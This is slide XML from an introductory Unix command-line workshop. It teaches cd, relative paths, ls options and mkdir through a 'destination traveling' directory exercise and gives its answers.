        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4168959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1.3:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825624"/>
            <a:ext cx="7886700" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Just like you can use ~ to mean home, you can also use .. in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to indicate relative paths </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>from the directory above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> your present working directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347428" y="2915196"/>
            <a:ext cx="4162425" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="22672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509853" y="5096656"/>
            <a:ext cx="4381500" cy="1495190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3814997" y="2990538"/>
            <a:ext cx="1079292" cy="9518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8049718" y="4658271"/>
            <a:ext cx="113988" cy="12101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437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2070"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exercise 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Destination Traveling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1293474"/>
            <a:ext cx="7886700" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>your directory to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2. Visit a place you’ve never been to before by changing directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>3. List all the locations in that directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>4. “Travel” directly to another “country” FROM YOUR CURRENT COUNTRY </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>5. Identify the absolute path to the file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Carmen-Sandiego.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>6. Identify the largest FILE in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>7. Determine what happens when you go up one level from your home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Hints:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The first thing you should do after changing directories is list the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Don’t forget the special options for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>How could you most efficiently complete Goals 5 and 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>? (use ls!)</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12096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Answers:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Change your directory to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd exercise1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. “Visit” a “country” you’ve never been to before: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>USA/Japan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. List all the locations in the “country”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. “Travel” directly to another “country” FROM YOUR CURRENT COUNTRY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>China/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5. Identify the absolute path to the file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Carmen-Sandiego.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home/20170301-unix-basic/exercise1/Peru/Lima/Carmen-Sandiego.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6. Identify the largest FILE in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lRS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Burj-Khalifa.txt (271.7KB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7. Determine what happens when you go up one level from your home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You will see everyone else’s directories! (You can’t go into those, though – you don’t have the correct permissions.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3776935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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making Files and Folders </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Overview:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2.1: Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2.2: Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2.3: Delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>files and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exercise 2: Making (and Breaking) Memories</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1546022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Make Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="5314950" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;directory-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	Creates a new directory (folder)	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	-p: Create multiple directory levels at once (if you want to nest a folder inside other folders)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5589847" y="1705676"/>
            <a:ext cx="3501140" cy="1258070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2368992" y="4222932"/>
            <a:ext cx="4721356" cy="2393016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
